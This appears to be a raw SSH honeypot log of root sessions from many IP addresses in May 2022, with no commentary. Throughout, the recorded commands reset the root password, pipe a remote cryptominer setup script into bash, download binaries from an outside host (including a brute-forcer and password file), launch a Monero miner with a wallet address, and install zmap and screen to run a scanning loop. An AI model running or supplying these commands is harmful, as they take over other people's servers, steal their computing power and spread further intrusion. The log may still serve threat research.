PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 46.170.151.34 18-May-2022 02:00:44 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 185.210.144.122 18-May-2022 02:02:36 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 78.92.170.193 18-May-2022 02:22:05 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 179.43.142.180 18-May-2022 02:53:43 ssh2 root
Exec echo root:dgtij24jti3u3ji4rgg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jti3u3ji4rgg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 121.200.53.148 18-May-2022 02:54:41 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 54.38.188.38 18-May-2022 02:55:41 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 179.43.142.180 18-May-2022 03:00:56 ssh2 root
Exec echo root:dgtij24jti3u3ji4rgg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jti3u3ji4rgg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 85.105.58.118 18-May-2022 03:09:02 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 175.178.251.145 18-May-2022 03:13:26 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 107.173.84.130 18-May-2022 03:17:43 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 185.135.232.174 18-May-2022 03:25:16 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 109.236.63.188 18-May-2022 03:28:44 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 118.195.235.49 18-May-2022 03:29:15 ssh2 root
apt install -y zmap || yum install -y zmap || dnf install -y zmap
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 92.205.21.38 18-May-2022 03:29:22 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
apt install -y screen || yum install -y screen || dnf install -y screen
screen -S 'auto' ./loop

From 178.62.216.128 18-May-2022 03:32:43 ssh2 root
Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop
curl -O http://134.122.59.164/systemd
curl -O http://134.122.59.164/banner.log
curl -O http://134.122.59.164/bios.txt
curl -O http://134.122.59.164/bone
curl -O http://134.122.59.164/brute
curl -O http://134.122.59.164/hrdmv1
curl -O http://134.122.59.164/loop
curl -O http://134.122.59.164/mfu.txt
curl -O http://134.122.59.164/motd
curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd
wget http://134.122.59.164/pass_file
wget http://134.122.59.164/motd
wget http://134.122.59.164/mfu.txt
wget http://134.122.59.164/loop
wget http://134.122.59.164/hrdmv1
wget http://134.122.59.164/brute
wget http://134.122.59.164/boner
wget http://134.122.59.164/bios.txt
wget http://134.122.59.164/banner.log
chmod 777 *
bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 120.236.78.194 18-May-2022 03:32:56 ssh2 root
apt install -y screen || yum install -y screen || dnf install -y screen
screen -S 'auto' ./loop
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 52.131.32.110 18-May-2022 03:33:56 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 120.236.78.194 18-May-2022 03:34:04 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
apt install -y screen || yum install -y screen || dnf install -y screen
screen -S 'auto' ./loop

From 178.62.216.128 18-May-2022 03:35:02 ssh2 root
Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop
curl -O http://134.122.59.164/systemd
curl -O http://134.122.59.164/banner.log
curl -O http://134.122.59.164/bios.txt
curl -O http://134.122.59.164/bone
curl -O http://134.122.59.164/brute
curl -O http://134.122.59.164/hrdmv1
curl -O http://134.122.59.164/loop
curl -O http://134.122.59.164/mfu.txt
curl -O http://134.122.59.164/motd
curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd
wget http://134.122.59.164/pass_file
wget http://134.122.59.164/motd
wget http://134.122.59.164/mfu.txt
wget http://134.122.59.164/loop
wget http://134.122.59.164/hrdmv1
wget http://134.122.59.164/brute
wget http://134.122.59.164/boner
wget http://134.122.59.164/bios.txt
wget http://134.122.59.164/banner.log
chmod 777 *
bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 160.120.129.184 18-May-2022 03:35:09 ssh2 root
apt install -y zmap || yum install -y zmap || dnf install -y zmap
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 150.107.95.20 18-May-2022 03:35:31 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 178.62.216.128 18-May-2022 03:39:47 ssh2 root
Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop
curl -O http://134.122.59.164/systemd
curl -O http://134.122.59.164/banner.log
curl -O http://134.122.59.164/bios.txt
curl -O http://134.122.59.164/bone
curl -O http://134.122.59.164/brute
curl -O http://134.122.59.164/hrdmv1
curl -O http://134.122.59.164/loop
curl -O http://134.122.59.164/mfu.txt
curl -O http://134.122.59.164/motd
curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd
wget http://134.122.59.164/pass_file
wget http://134.122.59.164/motd
wget http://134.122.59.164/mfu.txt
wget http://134.122.59.164/loop
wget http://134.122.59.164/hrdmv1
wget http://134.122.59.164/brute
wget http://134.122.59.164/boner
wget http://134.122.59.164/bios.txt
wget http://134.122.59.164/banner.log
chmod 777 *
bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 117.80.212.33 18-May-2022 03:39:53 ssh2 root
apt install -y zmap || yum install -y zmap || dnf install -y zmap
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 178.62.216.128 18-May-2022 03:40:59 ssh2 root
Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop
curl -O http://134.122.59.164/systemd
curl -O http://134.122.59.164/banner.log
curl -O http://134.122.59.164/bios.txt
curl -O http://134.122.59.164/bone
curl -O http://134.122.59.164/brute
curl -O http://134.122.59.164/hrdmv1
curl -O http://134.122.59.164/loop
curl -O http://134.122.59.164/mfu.txt
curl -O http://134.122.59.164/motd
curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd
wget http://134.122.59.164/pass_file
wget http://134.122.59.164/motd
wget http://134.122.59.164/mfu.txt
wget http://134.122.59.164/loop
wget http://134.122.59.164/hrdmv1
wget http://134.122.59.164/brute
wget http://134.122.59.164/boner
wget http://134.122.59.164/bios.txt
wget http://134.122.59.164/banner.log
chmod 777 *
bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 139.209.222.134 18-May-2022 03:41:06 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
apt install -y zmap || yum install -y zmap || dnf install -y zmap

From 118.41.204.72 18-May-2022 03:41:13 ssh2 root
apt install -y screen || yum install -y screen || dnf install -y screen
screen -S 'auto' ./loop

From 31.19.237.170 18-May-2022 03:51:19 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 178.62.216.128 18-May-2022 04:02:56 ssh2 root
Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop
curl -O http://134.122.59.164/systemd
curl -O http://134.122.59.164/banner.log
curl -O http://134.122.59.164/bios.txt
curl -O http://134.122.59.164/bone
curl -O http://134.122.59.164/brute
curl -O http://134.122.59.164/hrdmv1
curl -O http://134.122.59.164/loop
curl -O http://134.122.59.164/mfu.txt
curl -O http://134.122.59.164/motd
curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd
wget http://134.122.59.164/pass_file
wget http://134.122.59.164/motd
wget http://134.122.59.164/mfu.txt
wget http://134.122.59.164/loop
wget http://134.122.59.164/hrdmv1
wget http://134.122.59.164/brute
wget http://134.122.59.164/boner
wget http://134.122.59.164/bios.txt
wget http://134.122.59.164/banner.log
chmod 777 *
